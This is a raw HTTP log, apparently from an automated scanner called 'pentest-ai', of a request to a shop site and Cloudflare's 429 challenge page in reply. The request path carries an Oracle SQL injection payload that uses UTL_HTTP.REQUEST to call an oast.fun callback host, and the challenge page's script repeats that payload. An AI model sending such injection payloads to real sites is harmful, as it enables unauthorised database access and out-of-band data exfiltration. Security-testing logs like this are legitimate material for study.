REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%20%7C%7C%20%28SELECT%20UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zadz2lbov71tm8.oast.fun%2F%27%29%20FROM%20dual%29%20%7C%7C%20%27/assets/section-image-banner.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9965
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847a23f18a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=aNj0oH0xF36KfEMH2NyytgVjm8AEOBbzwSOIcZwKPzYNZBxBKowGVQVnah61lQMFA%2FAD2R7qcvDdfGkQrrfQtLMLOysWzAy74Y%2BCdebAgHs4M4rhgE3KpkVwnCi6voCGhAxCrHkbizBBWr1Iow%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847a23f18a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'bxdxNRW0ZEOTnACNsBW7waSimrr7M9B9aunZ_eZgoj0-1784281170-1.2.1.1-Cq3HneHmLRTP5yB5aIf2RDL4jPwlaZ2UlFYplSJcomgF58DDpkln6UhGtNKD6iV5',cITimeS: '1784281170',cRay: 'a1c847a23f18a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_HTTP.REQUEST('http:%2F%2Fh0cqg45t8jh21623dc0zadz2lbov71tm8.oast.fun%2F')%20FROM%20dual)%20%7C%7C%20'/assets/section-image-banner.css?__cf_chl_tk=srfwPQzBysJDH_qlmbuoGeMxq6sdPQYrkQSDousNTHU-1784281170-1.0.1.1-GWHu5BRomtaRqfjxnTUgRMAPZCCWf_7zedMDQHRBFvs",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_HTTP.REQUEST('http:%2F%2Fh0cqg45t8jh21623dc0zadz2lbov71tm8.oast.fun%2F')%20FROM%20dual)%20%7C%7C%20'/assets/section-image-banner.css?__cf_chl_f_tk=srfwPQzBysJDH_qlmbuoGeMxq6sdPQYrkQSDousNTHU-1784281170-1.0.1.1-GWHu5BRomtaRqfjxnTUgRMAPZCCWf_7zedMDQHRBFvs",md: '9I_c_53hrOc_aWYSwYvuylG2qgowlv8KkNGva3vbnS0-1784281170-1.2.1.1-0azTtwxb9GdCYrpfgFrqDDim4u_5DEkdmT_L899PETLa0NKusQucVjh69_8B0QNMpoYbYTT.TsOvSTI1AjsJM.CXo4pH91wObwmbJBL4QTavOdwgt6b15WXLp_zSSlhg3ftazEImMvfQl5Q1Rj3sFnjbMIQFL86qooRv5JBdZRjBLq6Xe2Ez6VVrHOXMZ9g3t2z0BiXuZAfgKHdAmWj88pHc5Js.QJLmzn6wmNxvyxgzg0SXIzbvxZI26yQD_Lm0VuKzYNs11IJpIbTBobqNO4RwQT8iYj5OCuYDyc7PNsRaCRpgVkxqTlr_Bdw7ugVYZIog8psf_XruVm5C47GXH3y1_T_BPys3l8u3EjkkQBeXiNT2qYV5C.2NrcfqVth451dPMbt9rxDZFGu5SVpAv9cy_o2SqS3CJ.UZkloz3D63oYqwvH_9nb4DGP_n67X4oehkAeIV9.Reg6nFXqpGVj4n.MkYAp7fOmAHKkyXTM8QsSl_QhX46GawvjLrPHssway1Ng63d.6oynPPADeLHqkqzgPdHRKDy0nKNbnLCs.J_UIJbLyvQAHegBl5LyBqX9cqq2ovxT.q9goNiehl9TaymQ9kbf_z0R7Hj7h6d8UxJNqs0DjtPnLKb9RCaHh4BTd.KfkiM5yRNpLIPGu1ouwncW8FcEYxco14Qxg1vmBDOmH9akjHIfphLs62brlJKu4zA08zrTTwmQt9xgopBvuq9lY1S4cnBigEUyUbygtZHGxNWHI7qoPEE95Y3zZr1jeo4LXNWpqyXiEXLcqMjUkhDJhzkwvjPyrIOnBCht9cqjbUXF6r.EFBK_qaqhlFRZp_aig1eB9K9OA0EjTbw5PnzARZdvFrB51elhE60LJVikdCzi5VZbRfvumH5tdtA.C1c4U0UBFgGS14rz128Rdlxc1jH_wWDVaqwttZkkD1fV_sIuhka9uYZ.d0UuGD9Bz.Ly2iwnjCvdMuHWcLtiKt0e.R21nSw3LXx083eUDtZZtbQ4BXUuxt1sB7az342icNoG_DWHbl9EKtIdHjP6iQ7fCACXtddivq1ccH2sYMm29x5INjZHEx3lKHylgdHF7GsneEbEURR6mq_kaMPcCiKnnh.Ah4Ol2YGyrmJuQg8uQ3qNko0J.YhzVXPosit0hB4b7kyj2renhtGXKYzTqn26QAwjSxgh4n7AmjDCHRjIR.OzrDE2UHJe_.ar9Ju_XAkOkeLUacrngQslnOKXUBsGVgxDhvM9IDG.7PvFokGXnfNUdSQkZcEs35cwqkLw2uTHQID5ajblWtIWbW3A.xN5QP3lrGgFPkitUAqiIg5VDvXpcA0NAfpJRiHq3xTXl8EcptgOobG.ixw3mUqHKlauVn7KSZyC8qSTd2RB.ycZGUcSj6BR51vsudrKff',mdrd: '9zWKI5f3UxetGvIDlsXqPZUtTWZHaw8jDfW._ieCpGw-1784281170-1.2.1.1-4Bqzk7GiRy7X9wUMHC2ZUEM3zRtBbagG_NYZmkHXoZHVPWEKfxvvA6xH3SLR77S3CuN.oFud8Kp.F7b2ayUF2Xr1k6EmSdYj3PTJdAPbSr.ap_36mf29D8Uke4OlYWIRZwWS3ZRvnq62eS5eN2U4R7TAfzTGlmRZAAmw4Yb9M_RV1iIdsDftge3PYOvhMDBs_.Ty0fhMe1gpzNBnI3hA26mNS1g4Xrk2W7Jtqh5K7u_N.6jYKKw4P4k4hqHTb65N',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847a23f18a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_HTTP.REQUEST('http:%2F%2Fh0cqg45t8jh21623dc0zadz2lbov71tm8.oast.fun%2F')%20FROM%20dual)%20%7C%7C%20'/assets/section-image-banner.css?__cf_chl_rt_tk=srfwPQzBysJDH_qlmbuoGeMxq6sdPQYrkQSDousNTHU-1784281170-1.0.1.1-GWHu5BRomtaRqfjxnTUgRMAPZCCWf_7zedMDQHRBFvs"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
